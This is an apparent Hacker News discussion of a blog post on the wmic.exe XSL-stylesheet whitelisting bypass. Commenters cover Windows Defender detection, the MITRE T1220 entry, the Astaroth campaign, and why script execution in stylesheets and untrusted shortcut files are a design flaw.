
Wmic.exe Whitelisting Bypass – Hacking with Style, Stylesheets (2018) - kencausey
https://subt0x11.blogspot.com/2018/04/
======
0xDEFC0DE
It's worth nothing that Windows Defender stops the 'remote include' part even
if there's nothing in the file (test.txt only contains the word 'blah' so we
should get a parsing/stylesheet error):

[https://i.imgur.com/jP3yJNQ.jpg](https://i.imgur.com/jP3yJNQ.jpg)

~~~
Izmaki
You beat me to it :D

------
kencausey
This story appears to be related to this:

[https://news.ycombinator.com/item?id=20384519](https://news.ycombinator.com/item?id=20384519)

More info (with some marketing):

[https://www.microsoft.com/security/blog/2019/07/08/dismantli...](https://www.microsoft.com/security/blog/2019/07/08/dismantling-
a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-
astaroth-attack/?utm_source=Direct)

------
ktpsns
This is something which baffles me as a +15yrs "linux guy" who thought to know
what kind of ecosystem the big desktop OS brings: MS Windows is really rich in
tooling, both in terms of desktop and command line tools. And there is similar
bloat as with Linux: I never heard of wmic.exe before, but the fact that it
can be used to manage network interfaces sounds similarly fucked up as the
linux story (/sbin/ifconfig, /sbin/ip, the unloved network manager, resolv.d,
etc. pp). Just to give another example: mshta.exe was basically the Electron
platform but in early 2000. And it was shipped right out of the box. That's
very elegant.

Since I have an addition to write tools which solve problems they were not
intended to solve (violating Unix philosophy), I admire that wmic.exe can use
XSLT to generate reports. Of course, PowerShell solves the problem of
structured output in a better way. A contemporary Unix tool would simply have
the option for JSON output and that's it. But including an XSL processor which
even executes scripting languages... hilarious!

------
toyg
Before inevitabile anti-XML comments appear: the hole is due to Microsoft
making it possible to execute VB code included in what were supposed to be
_style_ sheets. It’s like blindly eval()ing a json field: a bad idea
regardless of format, and not part of the spec (if i remember correctly).

------
kencausey
And here is a MITRE entry:

[https://attack.mitre.org/techniques/T1220/](https://attack.mitre.org/techniques/T1220/)

------
tinus_hn
Why does it run untrusted shortcut files in the first place? That’s where you
need to block, it’s clearly as bad as running executables sent through email.

~~~
kencausey
How is trust recorded for a shortcut?

~~~
tinus_hn
The same way it is recorded for any file: an attribute that says it came from
the web or email.

~~~
kencausey
Ah right, I wasn't thinking about that type of trust but I agree it is the
correct property in this situation.

